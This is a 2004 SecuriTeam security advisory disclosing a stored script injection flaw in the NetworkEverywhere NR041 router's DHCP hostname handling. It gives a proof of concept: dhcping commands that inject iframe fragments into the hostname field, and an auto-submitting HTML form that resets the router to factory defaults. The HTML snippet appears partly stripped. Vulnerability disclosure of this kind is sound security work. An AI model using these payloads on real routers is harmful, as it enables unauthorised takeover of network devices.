[NEWS] NetworkEverywhere Router Model NR041 Script Injection via DHCP
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org Date: 2 Sep 2004 12:55:40 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
NetworkEverywhere Router Model NR041 Script Injection via DHCP
<http://www.networkeverywhere.com/products/nr041.asp> The Network
Everywhere NR041 Cable/DSL 4-port router "connects multiple PCs to your
Cable or DSL modem. The router lets your PCs share one IP address from
your ISP, files, printers and other resources. It can also function as a
DHCP server for easy IP assignment".
DHCP HOSTNAME options originating from clients aren't properly filtered
for malicious content. Due to this fact, malicious script code can be
injected and stored on the router.
* NR041 firmware revision 1.2 release 03
Since the router doesn't filter out potentially problematic content it is
easily possible to inject script code into the web-based administrative
interface. At such a time when the administrator consults the DHCP
interface, the script code will be executed in the open session by the
browser and due to the nature of the session, will have full access to the
router. One possible and easily executed attack is to cause the script to
reset the router to its factory defaults, rolling back the administration
password as well.
Since the DHCP daemon is only accessible from within a local network it
would be hard to exploit. However, if a way exists to issue DHCP requests
to the router, this vulnerability can be exploited.
As mentioned above, the NR041 is configurable via a web based
administrative interface using several CGIs and invoked with the HTTP POST
method. It isn't entirely easy to exploit under the circumstances (15
character string which you cannot break where ever you wish) but a known
trick from the exploitation of the DLINK 614+ can be used for assistance.
* Step 1:
Because there isn't enough room to perform adequate exploitation in one
shot, a different approach can be used. Injecting code for an IFRAME that
will force the browser to to remotely call a certain HTML file, i.e.:
"a.htm" on a malicious website. This file contains a form which will
auto-submit itself when loaded. The code for such an HTML file is
presented below. However it is important to note that due to length
limitations the filename should be as short as possible:
< html>< head>
window.onerror = SymError;
< form name=xx method=post action="http://192.168.1.1/passwd.cgi">
< input type=hidden name=FactoryDefaults value="Enable">
The actual attack carried out by this HTML file is to call passwd.cgi with
the "factorydefaults" option enabled. Notice that the IP is hardcoded in
this file but it can actually be obtained from the HTTP referrer header,
making this script work seamlessly.
* Step 2:
Inject the script containing the IFRAME using DHCPing, like so:
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.121
-opthostname "/../a.htm' > " -m af:af:af:af:af:af
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.122
-opthostname "'src='//url.ca/" -m af:af:af:af:af:ae
dhcping -optleasetime 3600 -opttype discover -optreqip 192.168.1.123
-opthostname "<iframe id=' " -m af:af:af:af:af:ad
The information has been provided by <mailto:Daemonz@videotron.ca>
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: email@example.com
In order to subscribe to the mailing list, simply forward this email to: firstname.lastname@example.org
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.